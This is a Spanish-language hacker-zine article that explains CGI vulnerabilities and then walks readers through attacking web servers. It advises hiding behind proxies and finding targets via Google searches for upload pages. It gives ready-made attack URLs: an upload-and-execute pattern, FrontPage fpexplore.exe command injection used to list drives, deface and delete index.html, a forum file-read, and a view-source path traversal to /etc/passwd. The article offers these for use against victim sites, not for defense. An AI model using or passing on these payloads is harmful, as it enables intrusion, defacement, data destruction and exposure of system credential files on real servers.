Problemas con los cgi (1) by NORTH
---------------------------------------------------------------------------------------------------

Bueno, este es uno de esos textos con los k uno disfruta mucho, el motivo es 
facil, cuanto mas 
facil es acceder a un bug, mas bien se lo pasa uno viendo y aprendiendo los 
resutados de ello XD,

Hablemos un poco de que son los cgis "Common Gateway Interface" y que  
problemas ocasionan, el cgi es un programa que se ejecuta en el propio 
servidor y sirve para  crear foros,contadores, formularios, motores de 
busqueda, hacer  preguntas que un programa puede responder automaticamente 
etc..., en fin ofrecer interactividad en la web, pero ahora han salido otras 
alternativas como   ASP y JavaScript Liveware de Netscape, algunos controles 
ActiveX que slo funcionan en navegadores y servidores Web de Microsoft. 
Mucha gente relaciona el cgi con el perl no solo se  puede programar cgis en 
perl si no tambien en Visual Basic, c, Rexx, bash, Clipper, Visual C, Borland 
C, Delphi,  PHP etc... , pero el perl un lenguaje muy usado a la hora de hacer 
CGIs debido a su facilidad de aprendizaje, manejo, portabilidad y codigo 
abierto ya que es un script , hablaremos un poco de el, bien el el perl es un 
lenguaje k se usa en las pages web, bien, un amigete me comento que cada     
en perl solo 100 lineas de texto habia 90 bugs de seguridas, supongo k las 
1o lineas restantes eran comentarios o cosas asi..bueno, mojazos a parte, el 
CGI es un mundillo de posibilidades pa vosotros, y todo es debido a que en 
realidad los CGIs son programas que se ejecuta en un servidor con el cual tu 
interactuas, y esto es peligroso y mas si el server httpd esta corriendo como 
root. 
En k konsisten los bug CGI sus preguntareis..gueno, suelen ser errores a la 
hora de programar que permiten al atacante mediante el envio de una serie de 
parametros a un programa, provoca que este programa ejecute acciones no de 
seadas por el administrador claro esta,  muchos tipos de cosas que se suelen 
explotar con estos fallos desde ,los tipikos k te dejan manipular  
formularios, banners, o foros hasta los mas peligrosos que te dejan ver  
directorios del server, k te permiten bajar cosas, subir cosas o ver 
informacion que puede comprometer la seguridad del servidor...etc..usea k 
son la otia XD

wheno, para empezar con el tema amos haber si conseguimos descifrar unos 
pokitos hoy en este numero
y luego mas adelante le damos traya a otros...

Bien lo primero k teneis k hacer es empezar a pensar k no es muy interesante k 
digamos k se sepa kienes sois por internet no? asike enga ya zabeis k teneis k 
hacer...tirar de proxies XD asin sera ma jodio k tengais algun 
problemilla con lo k hagais....

un bug pa subir..cosillas y ejecutar cosillas :) :


1.)http://www.target.com/upload.html 

2.-)http://target/cgi/bin//...//upload/[nombre del archivejo] 

3.-)http://target/bin/test.txt;%20[comando a la shell]  




1:) Como pillamos el bug..os dire como buscar este tipo de  fallos, bien eso 
vale pa todo en general, asike abrir en google o algun otro buscador y buskar 
upload.html

Podeis encontrar servidores k os sale un dialogo donde podeis subir 
cosas, de todo supuestamente si si..me direis..otias tio k igual es k te 
dejan..gueno..si algunos ofrecen ese servicio para subir cosas, esto es algo 
peligroso la verdad.


otro bug...ejecutemos cosas en un sistema con el server frontpage: 


 hay un programilla k se incluye en algunos de los servidores frontpage, este 
programa es el fpexplore.exe, el cual nos va a servir de valiosa ayuda para la 
ejecucion de comandos...veamos como  

hagamos un dir....
http://www.victima.com/cgi-bin/fpexplore.exe?/c%20dir%20c:\ 

podemos tambien mandar mesajes..un echo 
 
http://www.VICITMA.com/cgi-bin/fpexplore.exe?/c%20echo%20"disidents%20strike%20again"%20>%20c:\webpage\index.html 

humm....y si borramos algo? }:)

http://www.VICTIMA.com/cgi-bin/fpexplore.exe?/c%20del%20c:\webpage\index.html 

ademas podeis probar con otros comandos...pa los k no entendais mucho de como 
va lo del cgi...sus lo pongo sencillo
http://www.target.com/cgi-bin/fpexplore.exe?/c%20KOMANDO%20c:\webpages\index.html(%20ADICIONAL) 
por ejemplo pa un rename, %20 son espacios 

 
mas bugs?..XD hay mas de 257..por el momento yo me he encontrado mas de 400 
por ahi..XD, pero en realidad hay tantos bugs como cgis mal programados. 
  

ver un documento-s del server:

/cgi-bin/forums/list.php?f=el archivo deseado php SIN LA EXTENSION

bueno eso con lo de  http://www.victima.com/cgi...etc etc

k pasa cuando no se chequean bien los argumentos k se pasan a un 
comando?..pasa k deja de hacer su funcion pasando a ser una herramienta 
estupenda para nosotros...bug del wiew-source

http://www.VICTIMA.com/cgi-bin/view-source?../../../../../../../etc/passwd

se suponia k la cosa era para mostrar documentos..y mira como termino XD


po ezo..mas en la proxima edicion...veremos los 257 basikos y alguno mas




 



